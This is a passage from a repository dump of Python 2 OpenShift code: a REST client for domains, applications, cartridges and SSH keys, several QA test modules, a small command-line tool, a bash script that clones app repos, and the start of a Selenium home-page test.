credentials)\")\n raise OpenShiftLoginException('Authorization Required')\n\n if self.rest.response.json is None:\n raise OpenShift500Exception(status)\n\n if domain_name is None:\n if self.rest.response.json['data']:\n res = self.rest.response.json['data'][0]['links'][index]\n return (res['href'], res['method'])\n else:\n raise OpenShiftNullDomainException(\"No domain has been initialized.\")\n #return ('Not Found', self.rest.response.json)\n\n else: # domain name is specified, now find a match\n json_data = self.rest.response.json['data']\n if json_data:\n for jd in json_data:\n if jd['id'] == domain_name:\n res = jd['links'][index]\n return (res['href'], res['method'])\n ### if here, then user has given a domain name that does not match what's registered with the system\n return(\"Not Found\", None)\n else:\n return(None, None)\n \n ##### /user (sshkey)\n #@conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def get_user(self):\n log.debug(\"Getting user information...\")\n (status, raw_response) = self.rest.request(method='GET', url='/user')\n if status == 'OK':\n return (status, self.rest.response.json['data']['login'])\n else:\n return (status, raw_response)\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS) \n def keys_list(self):\n log.debug(\"Getting ssh key information...\")\n (status, raw_response) = self.rest.request(method='GET', url='/user/keys')\n return (status, raw_response)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_add(self, kwargs):\n \"\"\"\n params: {name, type, key}\n \"\"\"\n if not kwargs.has_key('key'):\n # use a default path\n sshkey = '~/.ssh/id_rsa.pub'\n else:\n sshkey = kwargs['key']\n ssh_path = os.path.expanduser(sshkey)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n if kwargs.has_key('impersonate'):\n self.headers = {'X-Impersonate-User':kwargs['impersonate']}\n\n if not kwargs.has_key('name'):\n\n kwargs['name'] = 'default'\n \n if not kwargs.has_key('type'):\n kwargs['type'] = 'ssh-rsa'\n \n data_dict = {\n 'name': kwargs['name'],\n 'type': kwargs['type'],\n 'content': ssh_key_str\n }\n\n params = urllib.urlencode(data_dict)\n status, raw_response = self.rest.request(method='POST', url='/user/keys', params=params)\n return (status, raw_response)\n\n def key_update(self, kwargs):\n \"\"\"\n params: {name, type, key}\n \"\"\"\n if not kwargs.has_key('key'):\n # use a default path\n sshkey = '~/.ssh/id_rsa.pub'\n else:\n sshkey = kwargs['key']\n ssh_path = os.path.expanduser(sshkey)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n if kwargs.has_key('impersonate'):\n self.headers = {'X-Impersonate-User':kwargs['impersonate']}\n\n if not kwargs.has_key('name'):\n\n kwargs['name'] = 'default'\n\n if not kwargs.has_key('type'):\n kwargs['type'] = 'ssh-rsa'\n\n data_dict = {\n 'name': kwargs['name'],\n 'type': kwargs['type'],\n 'content': ssh_key_str\n }\n\n params = urllib.urlencode(data_dict)\n status, raw_response = self.rest.request(method='POST', url='/user/keys', params=params)\n return (status, raw_response)\n\n ##### /domains\n #@conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_create(self, name, impersonate=None):\n log.debug(\"Creating domain '%s'\" % name)\n TESTDATA = {\n 'id': name,\n 'rhlogin': self.user\n }\n\n params = urllib.urlencode(TESTDATA)\n\n if impersonate:\n self.headers['X-Impersonate-User'] = impersonate\n\n self.rest.request(method='POST', url='/domains', params=params)\n \"\"\"\n if self.rest.response.status == 201:\n log.info(\"Domain name '%s' created successfully.\" % name)\n else:\n log.info(\"Domain creation failed, reason: %s\" % self.rest.response.json['messages'])\n \"\"\"\n return self.rest.response.status, self.rest.response.body\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_delete(self, domain_name=None, force=True):\n \"\"\" destory a user's domain, if no name is given, figure it out\"\"\"\n if domain_name is None:\n status, res = self.domain_get()\n domain_name = status[1]\n\n\n url, method = self.get_href('/domains', 'delete', domain_name)\n #log.info(\"URL: %s\" % url)\n #res = self.rest.response.data[0]['links']['DELETE']\n if force:\n params = urllib.urlencode({'force': 'true'})\n if url:\n (status, raw_response)= self.rest.request(method=method, url=url, params=params)\n else: ## problem\n return (url, raw_response)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def domain_get(self, name=None):\n log.debug(\"Getting domain information...\")\n url, method = self.get_href('/domains', 'get', name)\n if url == 'Not Found':\n return ('Not Found', None)\n else:\n (status, raw_response) = self.rest.request(method=method, url=url)\n\n if status == 'OK':\n return (status, self.rest.response.json['data']['id'])\n\n def domain_update(self, new_name):\n params = urllib.urlencode({'id': new_name})\n url, method = self.get_href(\"/domains\", 'update')\n (status, res) = self.rest.request(method=method, url=url, params=params)\n return (status, res)\n\n def app_list(self):\n url, method = self.get_href('/domains', 'list_applications')\n (status, res) = self.rest.request(method=method, url=url)\n return (status, self.rest.response.json['data'])\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def app_create(self, app_name, app_type, scale='false', init_git_url=None, template_uuid=None):\n url, method = self.get_href('/domains', 'add_application')\n #valid_options = self.rest.response.json['data'][0]['links']['ADD_APPLICATION']['optional_params'][0]['valid_options']\n #if app_type not in valid_options:\n # log.error(\"The app type you specified '%s' is not supported!\" % app_type)\n # log.debug(\"supported apps types are: %s\" % valid_options)\n if init_git_url:\n data_dict = {'name':app_name, 'scale': scale, 'init_git_url': init_git_url}\n else:\n data_dict = {'name':app_name, 'scale': scale }\n\n params = urllib.urlencode(data_dict)\n if type(app_type) is list:\n is_str = all(isinstance(i, str) for i in app_type)\n if is_str:\n carts = \"&\" + urllib.urlencode([('cartridges[]', i) for i in app_type])\n else: # it's a list of dictionary {'name': <cart_name>}\n carts = \"&\" + urllib.urlencode([('cartridges[]', i['name']) for i in app_type])\n else:\n cart_param = {\n 'cartridges' : app_type,\n }\n carts = \"&\" + urllib.urlencode(cart_param)\n if template_uuid:\n data_dict['template'] = template_uuid\n del data_dict['cartridges']\n params = params + carts\n (status, res) = self.rest.request(method=method, url=url, params=params)\n return (status, res)\n\n ##### /cartridges\n def cartridges(self):\n (status, raw_response) = self.rest.request(method='GET', url='/cartridges')\n if status == 'OK':\n # return a list of cartridges that are supported\n return (status, self.rest.response.json['data'])\n else:\n return (status, raw_response)\n\n ##### /api get a list of support operations\n def api(self):\n #log.debug(\"Getting supported APIs...\")\n (status, raw_response) = self.rest.request(method='GET', url='/api')\n return (status, raw_response)\n\n ##### helper functions\n def do_action(self, kwargs):\n op = kwargs['op_type']\n if op == 'cartridge':\n status, res = self.cartridge_list(kwargs['app_name'])\n elif op == 'keys':\n status, res = self.keys_list()\n\n json_data = self.rest.response.json\n action = kwargs['action']\n name = kwargs['name']\n raw_response = None\n for data in json_data['data']:\n if data['name'] == name:\n params = data['links'][action]\n log.debug(\"Action: %s\" % action)\n if len(params['required_params']) > 0:\n # construct require parameter dictionary\n data = {}\n for rp in params['required_params']:\n param_name = rp['name']\n if kwargs['op_type'] == 'cartridge':\n data[param_name] = action.lower()\n else:\n data[param_name] = kwargs[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n (status, raw_response) = self.rest.request(method=params['method'], \n url=params['href'],\n params=data)\n return (status, self.rest.response.json)\n\n return (status, raw_response)\n\n #### application tempalte\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def app_templates(self):\n (status, raw_response) = self.rest.request(method='GET', url='/application_template')\n if status == 'OK':\n return (status, self.rest.response.json)\n else:\n return (status, raw_response)\n\n ##### keys\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_delete(self, key_name):\n \"\"\"\n li.key_delete('ssh_key_name')\n\n \"\"\"\n params = {\"action\": 'DELETE', 'name': key_name, \"op_type\": 'keys'}\n return self.do_action(params)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS) \n def key_update(self, kwargs): #key_name, key_path, key_type='ssh-rsa'):\n \"\"\"\n li.key_update({'name': 'new_key_name', 'key': new_key_path})\n\n \"\"\"\n key_path = kwargs['key']\n key_name = kwargs['name']\n if kwargs.has_key('key_type'):\n key_type = kwargs['key_type']\n else:\n key_type = 'ssh-rsa'\n ssh_path = os.path.expanduser(key_path)\n ssh_key_str = open(ssh_path, 'r').read().split(' ')[1]\n\n params = {'op_type':'keys', 'action': 'UPDATE', 'name': key_name, 'content': ssh_key_str, 'type': key_type}\n return self.do_action(params)\n \n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_get(self, name):\n \"\"\"\n li.key_get('target_key_name')\n returns the actual key content :$\n \n \"\"\"\n #params = {'action': 'GET', 'name': name, 'op_type': 'keys'}\n url = \"/user/keys/\" + name\n (status, raw_response) = self.rest.request(method='GET', url=url)\n if status == 'OK':\n return status, self.rest.response.json['data']\n else:\n return (status, raw_response)\n\n def key_action(self, kwargs):\n status, res = self.keys_list()\n json_data = self.rest.response.json\n action = kwargs['action']\n name = kwargs['name']\n for data in json_data['data']:\n if data['name'] == name:\n params = data['links'][action]\n log.debug(\"Action: %s\" % action)\n if len(params['required_params']) > 0:\n # construct require parameter dictionary\n data = {}\n for rp in params['required_params']:\n param_name = rp['name']\n data[param_name] = kwargs[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n break\n (status, raw_response) = self.rest.request(method=params['method'], \n url=params['href'], \n params=data)\n return (status, raw_response)\n\n\n\n\n\n ##### apps\n @timeit\n def app_create_scale(self, app_name, app_type, scale='true'):\n return self.app_create(app_name=app_name, app_type=app_type, scale=scale)\n \n @timeit\n def app_delete(self, app_name):\n params = {'action': 'DELETE', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_start(self, app_name): \n params = {\"action\": 'START', 'app_name': app_name}\n return self.app_action(params)\n @timeit \n def app_stop(self, app_name):\n params = {\"action\": 'STOP', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_restart(self, app_name):\n params = {\"action\": 'RESTART', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_force_stop(self, app_name):\n params = {\"action\": 'FORCE_STOP', 'app_name': app_name}\n return self.app_action(params)\n @timeit\n def app_get_descriptor(self, app_name):\n params = {'action': 'GET', 'app_name': app_name}\n return self.app_action(params)\n \n def app_get(self, app_name):\n params = {'action': 'GET', 'app_name': app_name}\n status, res = self.app_action(params)\n if status == 'OK':\n data_json = self.rest.response.json['data']\n return status, data_json\n else:\n return status, res\n\n #############################################################\n # event related functions\n #############################################################\n def app_scale_up(self, app_name):\n params = {'action': 'SCALE_UP', 'app_name': app_name}\n return self.app_action(params)\n\n def app_scale_down(self, app_name):\n params = {'action': 'SCALE_DOWN', 'app_name': app_name}\n return self.app_action(params)\n \n def app_add_alias(self, app_name, alias):\n params = {'action': 'ADD_ALIAS', 'app_name': app_name, 'alias': alias}\n return self.app_action(params)\n \n def app_remove_alias(self, app_name, alias):\n params = {'action': 'REMOVE_ALIAS', 'app_name': app_name, 'alias': alias}\n return self.app_action(params)\n\n def app_get_estimates(self):\n url, method = self.get_href('/estimates', 'get_estimate')\n (status, res) = self.rest.request(method=method, url=url)\n return (status, self.rest.response.json['data'])\n\n #params = {'action': 'GET_ESTIMATE'}\n #return self.app_action(params)\n \n def app_action(self, params):\n \"\"\" generic helper function that is capable of doing all the operations\n for application\n \"\"\"\n # step1. find th url and method\n status, res = self.app_list()\n\n app_found = False\n action = params['action']\n if params.has_key('app_name'):\n app_name = params['app_name']\n if params.has_key('cartridge'):\n cart_name = params['cartridge']\n\n for app in res:\n #for app in res['data']:\n\n if app['name'] == app_name:\n # found match, now do your stuff\n params_dict = app['links'][action]\n method = params_dict['method']\n log.info(\"Action: %s\" % action)\n data = {}\n if len(params_dict['required_params']) > 0:\n param_name = params_dict['required_params'][0]['name']\n rp = params_dict['required_params'][0]\n #data[param_name] = cart_name #'name'] = rp['name']\n for rp in params_dict['required_params']:\n # construct the data \n param_name = rp['name']\n if param_name == 'event':\n if isinstance(rp['valid_options'],list):\n data[param_name] = rp['valid_options'][0] \n else:\n data[param_name] = rp['valid_options']\n elif param_name == 'name':\n data[param_name] = params['cartridge']\n else:\n data[param_name] = params[param_name] #cart_name #params['op_type']\n #data[param_name] = params[param_name]\n data = urllib.urlencode(data)\n else:\n data = None\n req_url = params_dict['href']\n #print \"DATA: %s, URL: %s, METHOD: %s \" % (data, req_url, method)\n (status, raw_response) = self.rest.request(method=method, url=req_url, params=data)\n app_found = True\n return (status, raw_response)\n if not app_found:\n log.error(\"Can not find app matching your request '%s'\"% app_name)\n return (\"Error\", None)\n\n def get_gears(self, app_name, domain_name=None):\n \"\"\" return gears information \"\"\"\n params = {\"action\": 'GET_GEAR_GROUPS', 'app_name': app_name}\n status, res = self.app_action(params)\n gear_count = 0\n for gear_group in self.rest.response.json['data']:\n gear_count += len(gear_group['gears'])\n return (self.rest.response.json['data'], gear_count) \n\n ################################\n # cartridges\n ################################\n def cartridge_list(self, app_name):\n params = {\"action\": 'LIST_CARTRIDGES', 'app_name': app_name}\n return self.app_action(params)\n\n def cartridge_add(self, app_name, cartridge):\n params = {\"action\": 'ADD_CARTRIDGE', 'app_name': app_name,\n 'cartridge': cartridge}\n status, res = self.app_action(params)\n return (status, self.rest.response.json['messages'])\n \n def cartridge_delete(self, app_name, name):\n params = {\"action\": 'DELETE', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_start(self, app_name, name):\n params = {\"action\": 'START', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_stop(self, app_name, name):\n params = {\"action\": 'STOP', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_restart(self, app_name, name):\n params = {\"action\": 'RESTART', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_reload(self, app_name, name):\n params = {\"action\": 'RELOAD', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n \n def cartridge_get(self, app_name, name):\n params = {\"action\": 'GET', 'name': name, \"op_type\": 'cartridge', 'app_name': app_name}\n return self.do_action(params)\n\n\n def app_template_get(self):\n \"\"\" returnn a list of application template from an app \"\"\"\n status, res = self.rest.request(method='GET', url='/application_template')\n if status == 'OK':\n return (status, self.rest.response.json['data'])\n else:\n return (status, res)\n \n############################################################################\n# helper functions\n############################################################################\n\ndef get_black_list(rest_obj):\n status, res = rest_obj.api()\n json_obj = json.loads(res)\n black_list = json_obj['data']['ADD_DOMAIN']['required_params'][0]['invalid_options']\n return black_list\n\ndef sortedDict(adict):\n keys = adict.keys()\n keys.sort()\n return map(adict.get, keys)\n\ndef perf_test(li):\n cart_types = ['php-5.3']\n od = { \n 1: {'name': 'app_create', 'params': {'app_name': 'perftest'}},\n #2: {'name': 'app_delete', 'params': {'app_name': 'perftest'}},\n }\n sod = sortedDict(od)\n #li.domain_create('blahblah')\n cart_types = ['php-5.3']#'php-5.3', 'ruby-1.8', 'jbossas-7']\n for cart in cart_types:\n for action in sod:\n method_call = getattr(li, action['name'])\n k, v = action['params'].items()[0]\n if action['name'] == 'app_create':\n method_call(v, cart)\n else:\n method_call(v)\n\n\nif __name__ == '__main__':\n (options, args) = config_parser()\n li = Openshift(host=options.ip, user=options.user, passwd=options.password,\n debug=options.DEBUG,verbose=options.VERBOSE)\n #status, res = li.app_get_descriptor('xxxx')\n #status, res = li.get_gears('myjboss')\n #status, res = li.app_get_estimates()\n #status, res = li.domain_get(name=None)\n #app_type = [{'name': 'php-5.3'}, {'name':'mysql-5.1'}, {'name':'phpmyadmin-3.4'}]\n #status, res = li.app_create(app_name=\"app1\", app_type=app_type,\n # init_git_url=\"https://github.com/openshift/wordpress-example\")\n #print \"STAUS: %s\" % status\n #app_type=[\"ruby-1.9\", \"rockmongo-1.1\"]\n #status, res = li.app_create(app_name=\"app4\", app_type=app_type)\n #status, res = li.app_create(app_name=\"app3\", app_type='nodejs-0.6')\n #status, res = li.cartridge_add(app_name='app1', cartridge='mysql-5.1') #restart_app('myruby')\n status, res = li.cartridge_delete(app_name='app1', name='mysql-5.1')\n self.info('xxx', 1)\n #status, res = li.get_gears('27qxjfyjeo')\n #status, res = li.app_get('27qxjfyjeo')\n #self.info(\"xxx\", 1)\n #status, res = li.app_template_get() #app_get_descriptor('myapp2php')\n #li.app_remove_alias('php', 'new_name')\n #li = Openshift(host=\"stg.openshift.redhat.com\")\n #li = Openshift(host='107.20.38.71')\n #status, res = li.domain_create('pppx')\n\n #status, res = li.get_user()\n #gear, count = li.get_gears(app_name='php')\n #self.info(\"xxx\",1 )\n #status, res = li.app_list()\n #self.info(\"xxx\", 1)\n #perf_test(li)\n \n #status, res = li.add_application('abcdefg0123456789012345678901234567890', 'php-5.3')\n #li.create_domain('testbcc09a')\n #status, res = li.get_domain()\n #li.delete_domain(force=True)#delete_domain(\"testapp\")\n #self.info(\"xx\",1 )\n #status, res = li.add_key({'name': 'default', 'key':'~/.ssh/libra_id_rsa.pub'})\n #self.info(\"xxx\", 1)\n #li = Openshift(host='50.16.148.99') #107.21.64.242') \n #status, res = li.get_cartridge(app_name='myphp', name='mongodb-2.2')\n #og.debug(\"STATUS: %s\" % status)\n #status, res = li.reload_cartridge(app_name='myphp', name='phpmyadmin-3.4') #restart_app('myruby')\n #log.debug('STATUS: %s' % status) \n\n \n #status, res = li.delete_domain(force=True)\n #status, res = li.cartridges() \n #status, res = li.list_cartridges('myruby')\n #status, res = li.cartridge_add(app_name='myapp', cartridge='mysql-5.1') #restart_app('myruby')\n #status, res = li.cartridge_delete(app_name='myapp', name='mysql-5.1')\n \n #self.info(\"xxx\", 1)\n #status, res = li.delete_cartridge(app_name='myphp', name='mongodb-2.2') #restart_app('myruby')\n #status, res = li.delete_app('myperl')\n #status, res = li.add_application('myperl', 'perl-5.10')\n #status, res = li.delete_app(myperl')\n \n#\n #stat, res = li.create_domain('ab012345678901234567890123456789')\n #stat, res = li.delete_app('ab012345678901234567890123456789')\n #self.info(\"xxx\", 1)\n #status, res = li.get_domain()\n #log.info(\"status: %s\" % status)\n \n #li.add_application('myruby', 'ruby-1.8')\n #li.add_application('myphp', 'php-5.3')\n #status, res = li.update_domain('pnew')\n #self.info(\"xxx\", 1)\n #key = li.get_key('new1') #{'name':'new1'})\n #key_content = li.get_key(name='key1')\n #status, res = li.update_key({'name': 'new1', 'key':'~/.ssh/test.pub'})\n #li.delete_key({'name': 'newkey1', 'key': '~/.ssh/test.pub'})\n\n\n \n" }, { "alpha_fraction": 0.6024896502494812, "alphanum_fraction": 0.6074689030647278, "avg_line_length": 28.365854263305664, "blob_id": "ca622e4412c2f3d8b9a71ac7f63542457071b129", "content_id": "ce11580c2833ceb57704bad3e7879a42d23661e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 74, "num_lines": 41, "path": "/python-simple-cmd/scmd/commands/startproject.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nimport scmd\nfrom scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\nfrom scmd.utils import copy\n\n\nTEMPLATES_PATH = join(scmd.__path__[0], 'templates', 'project')\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"<project_name>\"\n\n def short_desc(self):\n return \"Create new project\"\n\n def long_desc(self):\n return \"Easy to create a new project\"\n\n def run(self, args, opts):\n if len(args) != 1:\n raise UsageError()\n # get project_name, dir path, and template_dir\n project_name = args[0]\n directory = os.getcwd()\n template_dir = os.path.join(scmd.__path__[0], 'templates/project')\n # error if\n if not re.search(r'^[_a-zA-Z]\\w*$', project_name):\n print 'Error: Project names must begin with a letter \\\n and contain only\\n' \\\n 'letters, numbers and underscores'\n sys.exit(1)\n elif exists(project_name):\n print \"Error: directory %r already exists\" % project_name\n sys.exit(1)\n copy.copy_helper(project_name, directory, template_dir)\n\n" }, { "alpha_fraction": 0.7185016870498657, "alphanum_fraction": 0.7287173867225647, "avg_line_length": 28.366666793823242, "blob_id": "d9d01e663777a347bad103467a18deb648c69c6d", "content_id": "685b1bebc6ab6107dc50d31797d95573d64feb9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 881, "license_type": "no_license", "max_line_length": 108, "num_lines": 30, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_prebuilt_wars_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 7, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossas_prebuilt_wars_without_jenkins import JBossHotDeployPrebuiltWarsWithoutJenkins\n\nclass EWSHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployPrebuiltWarsWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployPrebuiltWarsWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbossews']\n self.config.war_files = [ \"sample.war\" ]\n self.config.deploy_dir = \"webapps\"\n self.config.summary = \"[US2513] Hot deployment support for Jboss EWS application with pre-built war\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSHotDeployPrebuiltWarsWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.620581328868866, "alphanum_fraction": 0.6294841766357422, "avg_line_length": 35.371429443359375, "blob_id": "d4d53c569834e9194252e23b7f594bac10545078", "content_id": "53521a68602e4c39c92ae02b5449337d332585f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3819, "license_type": "no_license", "max_line_length": 206, "num_lines": 105, "path": "/automation/open/testmodules/RT/scaling/jbossews2_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\nimport shutil\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport subprocess\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'jbossews2' + common.getRandomString(8)\n try:\n self.app_type = common.app_types[self.get_variant()]\n except:\n self.app_type = common.app_types[\"jbossews2\"]\n\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n common.env_setup()\n\n def finalize(self):\n pass\n\n\n\nclass Jbossews2Mysql(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n common.grep_web_page(\"%s/mysql.jsp?action=insert&size=10\" % (app_url), \"records have been inserted into mysql\", delay=10, count=12)\n\n return common.grep_web_page(\"%s/mysql.jsp?action=show\" % (app_url), \"This is testing data for testing snapshoting and restoring big data in mysql database\", delay=10, count=12)\n\n def prepare_jsp_file(self):\n try:\n mysql = OSConf.get_embed_info(self.app_name,common.cartridge_types['mysql'])\n self.info(mysql)\n except Exception as e:\n self.error(str(e))\n return False\n # Prepare jsp file\n fr = file(\"%s/../cartridge/app_template/bigdata/mysql/mysql.jsp\" % (WORK_DIR), \"r\")\n jsp = fr.read()\n fr.close()\n fw = file(\"%s/src/main/webapp/mysql.jsp\" % (self.app_name), \"w\")\n fw.write(jsp)\n fw.close()\n # Prepare mysql connector\n os.mkdir(\"%s/src/main/webapp/WEB-INF/lib\" % (self.app_name))\n shutil.copyfile(\"%s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar\" % (WORK_DIR), \"%s/src/main/webapp/WEB-INF/lib/mysql-connector-java-5.1.20-bin.jar\" % (self.app_name))\n return True\n\n def test_method(self):\n ret = common.create_app(self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to app\")\n\n ret = self.prepare_jsp_file()\n self.assert_equal(ret, True, \"Failed to prepare jsp file and mysql connector\")\n\n ret = common.command_get_status(\"cd %s && git add . && git commit -amt && git push\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to git push\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work\")\n\n if self.scalable:\n ret = common.scale_up(self.app_name)\n self.assert_equal(ret, 0, \"Failed to scale up app\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work after scale up\")\n\n ret = common.scale_down(self.app_name)\n self.assert_equal(ret, 0, \"Failed to scale down app\")\n\n self.assert_equal(self.check_mysql_result(), 0, \"Mysql doesn't work after scale down\")\n\n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret, 0, \"Failed to remove mysql-5.1 from app\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Jbossews2Mysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5396226644515991, "alphanum_fraction": 0.5433962345123291, "avg_line_length": 21.08333396911621, "blob_id": "d627d098699d17917fdc94b588838356a03cb2b4", "content_id": "feb936a1d1c6b77b1228322931bdfb1cbf9d3364", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 265, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/automation/open/prepare_testing_data/clone_repo.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nrhlogin=\"xx\"\npasswd=\"redhat\"\n\napp_info=`rhc domain show -l ${rhlogin} -p ${passwd}`\nfor i in `echo \"${app_info}\" | grep ssh | awk -F'Git URL: ' '{print $2}'`; do\n echo \"Git cloning $i\"\n rm -rf $i\n git clone $i\n echo \"============\"\ndone\n" }, { "alpha_fraction": 0.5831775665283203, "alphanum_fraction": 0.6037383079528809, "avg_line_length": 23.31818199157715, "blob_id": "ce189e91ee56b8c4c08f631fdddd37f25d00859b", "content_id": "a9cbbb92831a575895f225416e87c7577fa0d2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "no_license", "max_line_length": 54, "num_lines": 22, "path": "/python-simple-cmd/scmd/commands/sdivide.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"divide_arg1 divide_arg2\"\n\n def short_desc(self):\n return \"Do dividion\"\n\n def long_desc(self):\n return \"Divide arg1 and arg2, and give result\"\n\n def run(self, args, opts):\n if len(args) != 2:\n raise UsageError()\n arg1 = args[0]\n arg2 = args[1]\n result = int(arg1) / int(arg2)\n print \"The dividion result is: %d.\" % result\n" }, { "alpha_fraction": 0.6756218671798706, "alphanum_fraction": 0.6756218671798706, "avg_line_length": 28.558822631835938, "blob_id": "0a04b4afdf5e76ce3d2cf2d50cabf002001511c2", "content_id": "fc87e5f7c79016e75afabcaaf899baf9e65eb439", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 87, "num_lines": 34, "path": "/automation/open/testmodules/RT/quick_start/quick_start_sinatra.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartSinatra(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Sinatra\"\n self.config.git_upstream_url = \"git://github.com/openshift/sinatra-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"the time where this server lives is\"\n \t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartSinatra)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6527243256568909, "alphanum_fraction": 0.6562312841415405, "avg_line_length": 59.890625, "blob_id": "653c222dd5d76fc599b0947077bc80bcda3314c8", "content_id": "3db278df387f0f36bf38be86b9205e9208def9f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11691, "license_type": "no_license", "max_line_length": 213, "num_lines": 192, "path": "/automation/open/testmodules/UI/web/tc_home.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass HomePage(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.binary= \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test__a_check_home_navigation_bar(self):\n baseutils.go_to_home(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='main_nav']/div/ul/li[1]/a\")\n 